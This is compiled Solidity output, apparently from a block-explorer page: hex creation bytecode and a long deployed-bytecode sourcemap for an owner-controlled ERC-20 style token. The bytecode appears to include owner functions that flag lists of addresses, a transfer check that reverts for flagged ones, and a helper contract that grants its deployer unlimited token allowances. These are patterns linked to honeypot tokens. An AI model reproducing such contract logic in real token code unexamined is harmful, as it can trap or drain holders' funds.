70a0823190602401602060405180830381865afa158015620027c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620027ec91906200313a565b105b15620027f8575050565b60095460075460085460065460405162e8e33760e81b81526001600160a01b0393841660048201529183166024830152604482018690526064820185905260006084830181905260a4830152821660c48201524260e482015291169063e8e3370090610104016060604051808303816000875af11580156200287e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620008dc9190620031d9565b6101b2806200320983390190565b82805482825590600052602060002090810192821562002908579160200282015b82811115620029085781546001600160a01b0319166001600160a01b03843516178255602090920191600190910190620028d3565b506200291692915062002958565b5090565b82805482825590600052602060002090810192821562002908579160200282015b82811115620029085782518255916020019190600101906200293b565b5b8082111562002916576000815560010162002959565b60008083601f8401126200298257600080fd5b50813567ffffffffffffffff8111156200299b57600080fd5b6020830191508360208260051b8501011115620029b757600080fd5b9250929050565b600080600060408486031215620029d457600080fd5b833567ffffffffffffffff811115620029ec57600080fd5b620029fa868287016200296f565b909790965060209590950135949350505050565b600060208083528351808285015260005b8181101562002a3d5785810183015185820160400152820162002a1f565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811462000d1457600080fd5b6000806040838503121562002a8857600080fd5b823562002a958162002a5e565b946020939093013593505050565b6000806040838503121562002ab757600080fd5b50508035926020909101359150565b60006020828403121562002ad957600080fd5b5035919050565b634e487b7160e01b600052604160045260246000fd5b6040516080810167ffffffffffffffff8111828210171562002b1c5762002b1c62002ae0565b60405290565b604051601f8201601f1916810167ffffffffffffffff8111828210171562002b4e5762002b4e62002ae0565b604052919050565b60006080828403121562002b6957600080fd5b62002b7362002af6565b90508135815260208201356020820152604082013560408201526060820135606082015292915050565b60006080828403121562002bb057600080fd5b62000e81838362002b56565b60008060006060848603121562002bd257600080fd5b833562002bdf8162002a5e565b9250602084013562002bf18162002a5e565b929592945050506040919091013590565b60006080828403121562002c1557600080fd5b50919050565b60008060a0838503121562002c2f57600080fd5b823562002c3c8162002a5e565b915062002c4d846020850162002c02565b90509250929050565b801515811462000d1457600080fd5b60006080828403121562002c7857600080fd5b62002c8262002af6565b9050813562002c918162002c56565b8082525060208201356020820152604082013560408201526060820135606082015292915050565b600067ffffffffffffffff82111562002cd65762002cd662002ae0565b5060051b60200190565b600082601f83011262002cf257600080fd5b8135602062002d0b62002d058362002cb9565b62002b22565b82815260059290921b8401810191818101908684111562002d2b57600080fd5b8286015b8481101562002d48578035835291830191830162002d2f565b509695505050505050565b6000806000806000610140868803121562002d6d57600080fd5b62002d79878762002b56565b945062002d8a876080880162002c65565b935061010086013567ffffffffffffffff8082111562002da957600080fd5b62002db789838a016200296f565b909550935061012088013591508082111562002dd257600080fd5b5062002de18882890162002ce0565b9150509295509295909350565b60006020828403121562002e0157600080fd5b813562000e818162002a5e565b60006080828403121562002e2157600080fd5b62000e81838362002c65565b60008060006040848603121562002e4357600080fd5b833567ffffffffffffffff8082111562002e5c57600080fd5b62002e6a878388016200296f565b9095509350602086013591508082111562002e8457600080fd5b5062002e938682870162002ce0565b9150509250925092565b6000806040838503121562002eb157600080fd5b823562002ebe8162002a5e565b9150602083013562002ed08162002a5e565b809150509250929050565b60006080828403121562002eee57600080fd5b62000e81838362002c02565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b60006001820162002f3b5762002f3b62002f10565b5060010190565b600181811c9082168062002f5757607f821691505b60208210810362002c1557634e487b7160e01b600052602260045260246000fd5b60006020828403121562002f8b57600080fd5b815162000e818162002a5e565b8082018082111562000993576200099362002f10565b600081518084526020808501945080840160005b8381101562002fe95781516001600160a01b03168752958201959082019060010162002fc2565b509495945050505050565b8281526040602082015260006200300f604083018462002fae565b949350505050565b600060208083850312156200302b57600080fd5b825167ffffffffffffffff8111156200304357600080fd5b8301601f810185136200305557600080fd5b80516200306662002d058262002cb9565b81815260059190911b820183019083810190878311156200308657600080fd5b928401925b82841015620030a6578351825292840192908401906200308b565b979650505050505050565b634e487b7160e01b600052601260045260246000fd5b60006001600160a01b0383811680620030e457620030e4620030b1565b92169190910492915050565b6001600160a01b0381811683821601908082111562003113576200311362002f10565b5092915050565b6000602082840312156200312d57600080fd5b815162000e818162002c56565b6000602082840312156200314d57600080fd5b5051919050565b808202811582820484141762000993576200099362002f10565b600082620031805762003180620030b1565b500490565b85815284602082015260a060408201526000620031a660a083018662002fae565b6001600160a01b0394909416606083015250608001529392505050565b8181038181111562000993576200099362002f10565b600080600060608486031215620031ef57600080fd5b835192506020840151915060408401519050925092509256fe608060405234801561001057600080fd5b506040516101b23803806101b283398101604081905261002f91610113565b60405163095ea7b360e01b815233600482015260001960248201526001600160a01b0382169063095ea7b3906044016020604051808303816000875af115801561007d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906100a19190610143565b5060405163095ea7b360e01b8152336004820181905260001960248301529063095ea7b3906044016020604051808303816000875af11580156100e8573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061010c9190610143565b5050610165565b60006020828403121561012557600080fd5b81516001600160a01b038116811461013c57600080fd5b9392505050565b60006020828403121561015557600080fd5b8151801515811461013c57600080fd5b603f806101736000396000f3fe6080604052600080fdfea2646970667358221220c3a7609ddfce617720b73c53a7d54a78aeb462334ddd50b0d71c48d2f432bd3564736f6c63430008130033a2646970667358221220380e4598d8df9583489a42d0b51651f69530f8ee0adbbd5e6d6514664925ffc664736f6c63430008130033
Deployed Bytecode Sourcemap
480:4459:11:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1640:192;;;;;;;;;;-1:-1:-1;1640:192:11;;;;;:::i;:::-;;:::i;:::-;;2154:98:1;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4431:197;;;;;;;;;;-1:-1:-1;4431:197:1;;;;;:::i;:::-;;:::i;:::-;;;2070:14:12;;2063:22;2045:41;;2033:2;2018:18;4431:197:1;1905:187:12;3910:118:11;;;;;;;;;;-1:-1:-1;3910:118:11;;;;;:::i;:::-;;:::i;1010:33:10:-;;;;;;;;;;-1:-1:-1;1010:33:10;;;;;:::i;:::-;;:::i;:::-;;;-1:-1:-1;;;;;2699:32:12;;;2681:51;;2669:2;2654:18;1010:33:10;2535:203:12;3242:106:1;;;;;;;;;;-1:-1:-1;3329:12:1;;3242:106;;;2889:25:12;;;2877:2;2862:18;3242:106:1;2743:177:12;1708:89:10;;;;;;;;;;-1:-1:-1;1708:89:10;;;;;:::i;:::-;;:::i;5190:286:1:-;;;;;;;;;;-1:-1:-1;5190:286:1;;;;;:::i;:::-;;:::i;3122:163:11:-;;;;;;;;;;-1:-1:-1;3122:163:11;;;;;:::i;:::-;;:::i;1286:294:10:-;;;;;;;;;;-1:-1:-1;1286:294:10;;;;;:::i;:::-;;:::i;1412:92:11:-;;;;;;;;;;-1:-1:-1;1412:92:11;;1495:1;7766:36:12;;7754:2;7739:18;1412:92:11;7624:184:12;3294:385:11;;;;;;;;;;-1:-1:-1;3294:385:11;;;;;:::i;:::-;;:::i;5871:234:1:-;;;;;;;;;;-1:-1:-1;5871:234:1;;;;;:::i;:::-;;:::i;578:89:3:-;;;;;;;;;;-1:-1:-1;578:89:3;;;;;:::i;:::-;;:::i;2645:266:10:-;;;;;;;;;;;;;:::i;567:36:11:-;;;;;;;;;;-1:-1:-1;567:36:11;;;;;:::i;:::-;;;;;;;;;;;;;;;;838:26:10;;;;;;;;;;-1:-1:-1;838:26:10;;;;;;;;;;;;;;;;;;;;;8315:14:12;;8308:22;8290:41;;8362:2;8347:18;;8340:34;;;;8390:18;;;8383:34;8448:2;8433:18;;8426:34;8277:3;8262:19;838:26:10;8065:401:12;4034:236:11;;;;;;;;;;-1:-1:-1;4034:236:11;;;;;:::i;:::-;;:::i;1831:101:0:-;;;;;;;;;;;;;:::i;1588:112:10:-;;;;;;;;;;-1:-1:-1;1588:112:10;;;;;:::i;:::-;;:::i;973:161:3:-;;;;;;;;;;-1:-1:-1;973:161:3;;;;;:::i;:::-;;:::i;4275:374:11:-;;;;;;;;;;-1:-1:-1;4275:374:11;;;;;:::i;:::-;;:::i;1805:281:10:-;;;;;;;;;;-1:-1:-1;1805:281:10;;;;;:::i;:::-;;:::i;669:41::-;;;;;;;;;;-1:-1:-1;669:41:10;;;;-1:-1:-1;;;;;669:41:10;;;4655:279:11;;;;;;;;;;-1:-1:-1;4655:279:11;;;;;:::i;:::-;;:::i;1050:28:10:-;;;;;;;;;;-1:-1:-1;1050:28:10;;;;;:::i;:::-;;:::i;1201:85:0:-;;;;;;;;;;-1:-1:-1;1273:6:0;;-1:-1:-1;;;;;1273:6:0;1201:85;;2365:102:1;;;;;;;;;;;;;:::i;851:16:11:-;;;;;;;;;;-1:-1:-1;851:16:11;;;;;;;;;;;;;;;;;;;9174:25:12;;;9230:2;9215:18;;9208:34;;;;9258:18;;;9251:34;9316:2;9301:18;;9294:34;9161:3;9146:19;851:16:11;8943:391:12;6592:427:1;;;;;;;;;;-1:-1:-1;6592:427:1;;;;;:::i;:::-;;:::i;2094:543:10:-;;;;;;;;;;-1:-1:-1;2094:543:10;;;;;:::i;:::-;;:::i;983:18::-;;;;;;;;;;-1:-1:-1;983:18:10;;;;;;;;;;;;;;;3727:189:1;;;;;;;;;;-1:-1:-1;3727:189:1;;;;;:::i;:::-;;:::i;2919:266:10:-;;;;;;;;;;;;;:::i;3974:149:1:-;;;;;;;;;;-1:-1:-1;3974:149:1;;;;;:::i;:::-;;:::i;611:36:11:-;;;;;;;;;;-1:-1:-1;611:36:11;;;;;:::i;:::-;;;;;;;;;;;;;;2081:198:0;;;;;;;;;;-1:-1:-1;2081:198:0;;;;;:::i;:::-;;:::i;3685:90:11:-;;;;;;;;;;-1:-1:-1;3685:90:11;;;;;:::i;:::-;;:::i;1550:83::-;;;;;;;;;;-1:-1:-1;1550:83:11;;;;;:::i;:::-;;:::i;1640:192::-;1094:13:0;:11;:13::i;:::-;1731:4:11;1720:10:::1;1753:71;1769:5;1767:1;:7;1753:71;;;1810:2;1794:6;:15;1801:4;;1806:1;1801:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;1794:15:11::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;1794:15:11;:18;1775:3;::::1;::::0;::::1;:::i;:::-;;;;1753:71;;;;1709:123;1640:192:::0;;;:::o;2154:98:1:-;2208:13;2240:5;2233:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2154:98;:::o;4431:197::-;4514:4;719:10:5;4568:32:1;719:10:5;4584:7:1;4593:6;4568:8;:32::i;:::-;4617:4;4610:11;;;4431:197;;;;;:::o;3910:118:11:-;1094:13:0;:11;:13::i;:::-;3979:15:11::1;:22:::0;;;;4012:4:::1;:8:::0;3910:118::o;1010:33:10:-;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;1010:33:10;;-1:-1:-1;1010:33:10;:::o;1708:89::-;1094:13:0;:11;:13::i;:::-;1775:14:10;;:5:::1;:14:::0;::::1;::::0;::::1;::::0;;;::::1;::::0;::::1;::::0;;;::::1;;::::0;;;1708:89::o;5190:286:1:-;5317:4;719:10:5;5373:38:1;5389:4;719:10:5;5404:6:1;5373:15;:38::i;:::-;5421:27;5431:4;5437:2;5441:6;5421:9;:27::i;:::-;-1:-1:-1;5465:4:1;;5190:286;-1:-1:-1;;;;5190:286:1:o;3122:163:11:-;1094:13:0;:11;:13::i;:::-;3204:19:11::1;3213:9;3204:8;:19::i;:::-;3234:18;3242:9;3234:7;:18::i;:::-;3263:14;3271:5;3263:7;:14::i;:::-;3122:163:::0;;:::o;1286:294:10:-;1094:13:0;:11;:13::i;:::-;1475:21:10::1;1484:11;1475:8;:21::i;:::-;1507:29;1525:10;1507:17;:29::i;:::-;1547:25;1560:4;;1566:5;1547:12;:25::i;3294:385:11:-:0;1094:13:0;:11;:13::i;:::-;3380:7:11::1;::::0;3421:16:::1;::::0;;-1:-1:-1;;;3421:16:11;;;;-1:-1:-1;;;;;3380:7:11;;::::1;::::0;3357:14:::1;::::0;3380:7;;3421:14:::1;::::0;:16:::1;::::0;;::::1;::::0;::::1;::::0;;;;;;;;;3380:7;3421:16:::1;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3412:65;::::0;-1:-1:-1;;;3412:65:11;;-1:-1:-1;;;;;11934:15:12;;;3412:65:11::1;::::0;::::1;11916:34:12::0;3471:4:11::1;11966:18:12::0;;;11959:43;3412:34:11;;;::::1;::::0;::::1;::::0;11851:18:12;;3412:65:11::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3399:78:::0;-1:-1:-1;;;;;;3491:16:11;::::1;3488:95;;3524:6;-1:-1:-1::0;;;;;3524:14:11::1;;:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3515:68;::::0;-1:-1:-1;;;3515:68:11;;-1:-1:-1;;;;;11934:15:12;;;3515:68:11::1;::::0;::::1;11916:34:12::0;3577:4:11::1;11966:18:12::0;;;11959:43;3515:37:11;;;::::1;::::0;::::1;::::0;11851:18:12;;3515:68:11::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;3508:75;;3488:95;-1:-1:-1::0;;;;;3602:16:11;::::1;3594:46;;;::::0;-1:-1:-1;;;3594:46:11;;12215:2:12;3594:46:11::1;::::0;::::1;12197:21:12::0;12254:2;12234:18;;;12227:30;-1:-1:-1;;;12273:18:12;;;12266:47;12330:18;;3594:46:11::1;;;;;;;;;-1:-1:-1::0;;;;;3652:12:11::1;;::::0;;;:6:::1;:12;::::0;;;;:17;;-1:-1:-1;;3652:17:11::1;3665:4;3652:17;::::0;;-1:-1:-1;;3294:385:11:o;5871:234:1:-;5959:4;719:10:5;6013:64:1;719:10:5;6029:7:1;6066:10;6038:25;719:10:5;6029:7:1;6038:9;:25::i;:::-;:38;;;;:::i;:::-;6013:8;:64::i;578:89:3:-;633:27;719:10:5;653:6:3;633:5;:27::i;:::-;578:89;:::o;2645:266:10:-;2762:16;;;2776:1;2762:16;;;;;;;;2692:4;;;;2762:16;2776:1;2762:16;;;;;;;;-1:-1:-1;;2804:6:10;;2789:12;;;;-1:-1:-1;;;;;;2804:6:10;;2789:12;;-1:-1:-1;2804:6:10;;2789:12;;;;:::i;:::-;-1:-1:-1;;;;;2789:21:10;;;:12;;;;;;;;;:21;2836:6;;2821:12;;2836:6;;;2821:9;;2836:6;;2821:12;;;;;;:::i;:::-;-1:-1:-1;;;;;2821:21:10;;;:12;;;;;;;;;:21;2860:6;;:40;;-1:-1:-1;;;2860:40:10;;:6;;;:20;;:40;;2881:7;;2890:9;;2860:40;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;2860:40:10;;;;;;;;;;;;:::i;:::-;2901:1;2860:43;;;;;;;;:::i;:::-;;;;;;;2853:50;;;2645:266;:::o;4034:236:11:-;-1:-1:-1;;;;;3506:18:1;;4108:4:11;3506:18:1;;;;;;;;;;;4108:4:11;;4174:37;;4204:7;4034:236;-1:-1:-1;;4034:236:11:o;4174:37::-;4237:1;4229:7;:9;:33;;4247:15;;4229:33;;;4239:7;4229:33;4222:40;4034:236;-1:-1:-1;;;4034:236:11:o;1831:101:0:-;1094:13;:11;:13::i;:::-;1895:30:::1;1922:1;1895:18;:30::i;:::-;1831:101::o:0;1588:112:10:-;1094:13:0;:11;:13::i;:::-;1672:20:10;;:8:::1;:20:::0;;-1:-1:-1;;1672:20:10::1;::::0;::::1;;::::0;;;::::1;::::0;;::::1;::::0;::::1;::::0;;;::::1;::::0;::::1;::::0;;;::::1;;::::0;;;1588:112::o;973:161:3:-;1049:46;1065:7;719:10:5;1088:6:3;1049:15;:46::i;:::-;1105:22;1111:7;1120:6;1105:5;:22::i;4275:374:11:-;4322:17;4350:13;4389:6;4384:258;4405:3;4401:1;:7;4384:258;;;4457:5;;4450:12;;-1:-1:-1;;;;;4457:5:11;-1:-1:-1;;4450:12:11;:::i;:::-;4486:5;;4430:33;;-1:-1:-1;4486:7:11;;-1:-1:-1;;;;;4486:5:11;;:7;:::i;:::-;4478:5;:15;;-1:-1:-1;;;;;;4478:15:11;-1:-1:-1;;;;;4478:15:11;;;;;;;;;4524:12;;-1:-1:-1;;4524:12:11;:::i;:::-;4560:5;;4508:29;;-1:-1:-1;4560:7:11;;-1:-1:-1;;;;;4560:5:11;;:7;:::i;:::-;4552:5;:15;;-1:-1:-1;;;;;;4552:15:11;-1:-1:-1;;;;;4552:15:11;;;;;;4614;;4587:43;;2889:25:12;;;4587:43:11;;;;;;;;;2877:2:12;2862:18;4587:43:11;;;;;;;4410:3;;;;:::i;:::-;;;;4384:258;;;;4311:338;;4275:374;:::o;1805:281:10:-;1094:13:0;:11;:13::i;:::-;1866:6:10::1;:14:::0;;-1:-1:-1;;;;;;1866:14:10::1;-1:-1:-1::0;;;;;1866:14:10;::::1;::::0;;::::1;::::0;;;1911:28:::1;::::0;::::1;::::0;::::1;:::i;:::-;-1:-1:-1::0;;;;;2699:32:12;;;2681:51;;2669:2;2654:18;1911:28:10::1;;;;;;;;;;;;;;;;::::0;::::1;;;;;-1:-1:-1::0;1891:17:10::1;:48:::0;;-1:-1:-1;;;;;;1891:48:10::1;-1:-1:-1::0;;;;;1891:48:10;;::::1;;::::0;;1958:6:::1;::::0;1982::::1;::::0;1951:59:::1;::::0;-1:-1:-1;;;1951:59:10;;1982:6;;::::1;1951:59;::::0;::::1;14903:51:12::0;-1:-1:-1;;14970:18:12;;;14963:34;1958:6:10;::::1;::::0;1951:22:::1;::::0;14876:18:12;;1951:59:10::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;2037:6;;;;;;;;;-1:-1:-1::0;;;;;2037:6:10::1;-1:-1:-1::0;;;;;2037:14:10::1;;:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;2063:6;::::0;2071::::1;::::0;2028:50:::1;::::0;-1:-1:-1;;;2028:50:10;;-1:-1:-1;;;;;2063:6:10;;::::1;2028:50;::::0;::::1;11916:34:12::0;2071:6:10;;::::1;11966:18:12::0;;;11959:43;2028:34:10;::::1;::::0;::::1;::::0;11851:18:12;;2028:50:10::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;2021:4;:57:::0;;-1:-1:-1;;;;;;2021:57:10::1;-1:-1:-1::0;;;;;2021:57:10;;;::::1;::::0;;;::::1;::::0;;-1:-1:-1;1805:281:10:o;4655:279:11:-;-1:-1:-1;;;;;4726:17:11;;4723:202;;4784:3;;4776:35;;4761:12;;-1:-1:-1;;;;;4784:3:11;;4800:6;;4761:12;4776:35;4761:12;4776:35;4800:6;4784:3;4776:35;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4760:51;;;4835:7;4827:35;;;;-1:-1:-1;;;4827:35:11;;15670:2:12;4827:35:11;;;15652:21:12;15709:2;15689:18;;;15682:30;-1:-1:-1;;;15728:18:12;;;15721:45;15783:18;;4827:35:11;15468:339:12;4827:35:11;4744:131;3122:163;;:::o;4723:202::-;4914:3;;4891:34;;-1:-1:-1;;;4891:34:11;;-1:-1:-1;;;;;4914:3:11;;;4891:34;;;14903:51:12;14970:18;;;14963:34;;;4891:22:11;;;;;;14876:18:12;;4891:34:11;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;1050:28:10:-;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;1050:28:10;:::o;2365:102:1:-;2421:13;2453:7;2446:14;;;;;:::i;6592:427::-;6685:4;719:10:5;6685:4:1;6766:25;719:10:5;6783:7:1;6766:9;:25::i;:::-;6739:52;;6829:15;6809:16;:35;;6801:85;;;;-1:-1:-1;;;6801:85:1;;16014:2:12;6801:85:1;;;15996:21:12;16053:2;16033:18;;;16026:30;16092:34;16072:18;;;16065:62;-1:-1:-1;;;16143:18:12;;;16136:35;16188:19;;6801:85:1;15812:401:12;6801:85:1;6920:60;6929:5;6936:7;6964:15;6945:16;:34;6920:8;:60::i;2094:543:10:-;1094:13:0;:11;:13::i;:::-;2223:15:10;2215:46:::1;;;::::0;-1:-1:-1;;;2215:46:10;;16420:2:12;2215:46:10::1;::::0;::::1;16402:21:12::0;16459:2;16439:18;;;16432:30;-1:-1:-1;;;16478:18:12;;;16471:48;16536:18;;2215:46:10::1;16218:342:12::0;2215:46:10::1;2295:12:::0;;2280:27;::::1;2272:67;;;::::0;-1:-1:-1;;;2272:67:10;;16767:2:12;2272:67:10::1;::::0;::::1;16749:21:12::0;16806:2;16786:18;;;16779:30;16845:29;16825:18;;;16818:57;16892:18;;2272:67:10::1;16565:351:12::0;2272:67:10::1;2350:10;2380:6:::0;2375:94:::1;2396:5;:12;2392:1;:16;2375:94;;;2438:19;2448:5;2454:1;2448:8;;;;;;;;:::i;:::-;;;;;;;2438:5;:9;;:19;;;;:::i;:::-;2430:27:::0;-1:-1:-1;2410:3:10;::::1;::::0;::::1;:::i;:::-;;;;2375:94;;;;2495:1;2487:5;:9;2479:54;;;::::0;-1:-1:-1;;;2479:54:10;;17123:2:12;2479:54:10::1;::::0;::::1;17105:21:12::0;;;17142:18;;;17135:30;17201:34;17181:18;;;17174:62;17253:18;;2479:54:10::1;16921:356:12::0;2479:54:10::1;2544:23;:16;2563:4:::0;;2544:23:::1;:::i;:::-;-1:-1:-1::0;2578:22:10;;::::1;::::0;:14:::1;::::0;:22:::1;::::0;::::1;::::0;::::1;:::i;:::-;-1:-1:-1::0;2611:10:10::1;:18:::0;-1:-1:-1;;;2094:543:10:o;3727:189:1:-;3806:4;719:10:5;3860:28:1;719:10:5;3877:2:1;3881:6;3860:9;:28::i;2919:266:10:-;3036:16;;;3050:1;3036:16;;;;;;;;2966:4;;;;3036:16;3050:1;3036:16;;;;;;;;-1:-1:-1;;3078:6:10;;3063:12;;;;-1:-1:-1;;;;;;3078:6:10;;3063:12;;-1:-1:-1;3078:6:10;;3063:12;;;;:::i;:::-;-1:-1:-1;;;;;3063:21:10;;;:12;;;;;;;;;:21;3110:6;;3095:12;;3110:6;;;3095:9;;3110:6;;3095:12;;;;;;:::i;3974:149:1:-;-1:-1:-1;;;;;4089:18:1;;;4063:7;4089:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3974:149::o;2081:198:0:-;1094:13;:11;:13::i;:::-;-1:-1:-1;;;;;2169:22:0;::::1;2161:73;;;::::0;-1:-1:-1;;;2161:73:0;;17484:2:12;2161:73:0::1;::::0;::::1;17466:21:12::0;17523:2;17503:18;;;17496:30;17562:34;17542:18;;;17535:62;-1:-1:-1;;;17613:18:12;;;17606:36;17659:19;;2161:73:0::1;17282:402:12::0;2161:73:0::1;2244:28;2263:8;2244:18;:28::i;3685:90:11:-:0;1094:13:0;:11;:13::i;:::-;-1:-1:-1;;;;;3748:12:11::1;3761:5;3748:12:::0;;;:6:::1;:12;::::0;;;;:18;;-1:-1:-1;;3748:18:11::1;::::0;;3685:90::o;1550:83::-;1094:13:0;:11;:13::i;:::-;17833:19:12;;1615:4:11::1;17820:33:12::0;17907:2;17896:14;;17883:28;17869:12;17862:50;17966:2;17955:14;;17942:28;17928:12;17921:50;18025:2;18014:14;18001:28;17987:12;17980:50;3122:163:11:o;1359:130:0:-;1273:6;;-1:-1:-1;;;;;1273:6:0;719:10:5;1422:23:0;1414:68;;;;-1:-1:-1;;;1414:68:0;;18243:2:12;1414:68:0;;;18225:21:12;;;18262:18;;;18255:30;18321:34;18301:18;;;18294:62;18373:18;;1414:68:0;18041:356:12;10504:370:1;-1:-1:-1;;;;;10635:19:1;;10627:68;;;;-1:-1:-1;;;10627:68:1;;18604:2:12;10627:68:1;;;18586:21:12;18643:2;18623:18;;;18616:30;18682:34;18662:18;;;18655:62;-1:-1:-1;;;18733:18:12;;;18726:34;18777:19;;10627:68:1;18402:400:12;10627:68:1;-1:-1:-1;;;;;10713:21:1;;10705:68;;;;-1:-1:-1;;;10705:68:1;;19009:2:12;10705:68:1;;;18991:21:12;19048:2;19028:18;;;19021:30;19087:34;19067:18;;;19060:62;-1:-1:-1;;;19138:18:12;;;19131:32;19180:19;;10705:68:1;18807:398:12;10705:68:1;-1:-1:-1;;;;;10784:18:1;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;10835:32;;2889:25:12;;;10835:32:1;;2862:18:12;10835:32:1;;;;;;;10504:370;;;:::o;11155:441::-;11285:24;11312:25;11322:5;11329:7;11312:9;:25::i;:::-;11285:52;;-1:-1:-1;;11351:16:1;:37;11347:243;;11432:6;11412:16;:26;;11404:68;;;;-1:-1:-1;;;11404:68:1;;19412:2:12;11404:68:1;;;19394:21:12;19451:2;19431:18;;;19424:30;19490:31;19470:18;;;19463:59;19539:18;;11404:68:1;19210:353:12;11404:68:1;11514:51;11523:5;11530:7;11558:6;11539:16;:25;11514:8;:51::i;7473:818::-;-1:-1:-1;;;;;7599:18:1;;7591:68;;;;-1:-1:-1;;;7591:68:1;;19770:2:12;7591:68:1;;;19752:21:12;19809:2;19789:18;;;19782:30;19848:34;19828:18;;;19821:62;-1:-1:-1;;;19899:18:12;;;19892:35;19944:19;;7591:68:1;19568:401:12;7591:68:1;-1:-1:-1;;;;;7677:16:1;;7669:64;;;;-1:-1:-1;;;7669:64:1;;20176:2:12;7669:64:1;;;20158:21:12;20215:2;20195:18;;;20188:30;20254:34;20234:18;;;20227:62;-1:-1:-1;;;20305:18:12;;;20298:33;20348:19;;7669:64:1;19974:399:12;7669:64:1;7744:38;7765:4;7771:2;7775:6;7744:20;:38::i;:::-;-1:-1:-1;;;;;7815:15:1;;7793:19;7815:15;;;;;;;;;;;7848:21;;;;7840:72;;;;-1:-1:-1;;;7840:72:1;;20580:2:12;7840:72:1;;;20562:21:12;20619:2;20599:18;;;20592:30;20658:34;20638:18;;;20631:62;-1:-1:-1;;;20709:18:12;;;20702:36;20755:19;;7840:72:1;20378:402:12;7840:72:1;-1:-1:-1;;;;;7946:15:1;;;:9;:15;;;;;;;;;;;7964:20;;;7946:38;;8161:13;;;;;;;;;;:23;;;;;;8210:26;;2889:25:12;;;8161:13:1;;8210:26;;2862:18:12;8210:26:1;;;;;;;8247:37;8267:4;8273:2;8277:6;8247:19;:37::i;9422:659::-;-1:-1:-1;;;;;9505:21:1;;9497:67;;;;-1:-1:-1;;;9497:67:1;;20987:2:12;9497:67:1;;;20969:21:12;21026:2;21006:18;;;20999:30;21065:34;21045:18;;;21038:62;-1:-1:-1;;;21116:18:12;;;21109:31;21157:19;;9497:67:1;20785:397:12;9497:67:1;9575:49;9596:7;9613:1;9617:6;9575:20;:49::i;:::-;-1:-1:-1;;;;;9660:18:1;;9635:22;9660:18;;;;;;;;;;;9696:24;;;;9688:71;;;;-1:-1:-1;;;9688:71:1;;21389:2:12;9688:71:1;;;21371:21:12;21428:2;21408:18;;;21401:30;21467:34;21447:18;;;21440:62;-1:-1:-1;;;21518:18:12;;;21511:32;21560:19;;9688:71:1;21187:398:12;9688:71:1;-1:-1:-1;;;;;9793:18:1;;:9;:18;;;;;;;;;;;9814:23;;;9793:44;;9930:12;:22;;;;;;;9978:37;2889:25:12;;;9793:9:1;;:18;9978:37;;2862:18:12;9978:37:1;;;;;;;10026:48;10046:7;10063:1;10067:6;10026:19;:48::i;2433:187:0:-;2525:6;;;-1:-1:-1;;;;;2541:17:0;;;-1:-1:-1;;;;;;2541:17:0;;;;;;;2573:40;;2525:6;;;2541:17;2525:6;;2573:40;;2506:16;;2573:40;2496:124;2433:187;:::o;2755:96:6:-;2813:7;2839:5;2843:1;2839;:5;:::i;2122:317:11:-;908:9;;-1:-1:-1;;;908:9:11;;;;905:21;;;2122:317;;;:::o;905:21::-;936:9;:14;;-1:-1:-1;;;;936:14:11;-1:-1:-1;;;936:14:11;;;2228:18:::1;2238:4:::0;2243:2;2228:9:::1;:18::i;:::-;2225:76;;;2270:19;::::0;-1:-1:-1;;;2270:19:11;;-1:-1:-1;;;;;2699:32:12;;2270:19:11::1;::::0;::::1;2681:51:12::0;2654:18;;2270:19:11::1;2535:203:12::0;2225:76:11::1;-1:-1:-1::0;;;;;2315:12:11;::::1;;::::0;;;:6:::1;:12;::::0;;;;;::::1;;2314:13;:28:::0;::::1;;;-1:-1:-1::0;;;;;;2332:10:11;::::1;;::::0;;;:6:::1;:10;::::0;;;;;::::1;;2331:11;2314:28;:41;;;-1:-1:-1::0;2346:9:11;;2314:41:::1;2357:7;2311:53;-1:-1:-1::0;;;;;2381:12:11;::::1;2374:6;2381:12:::0;;;:6:::1;:12;::::0;;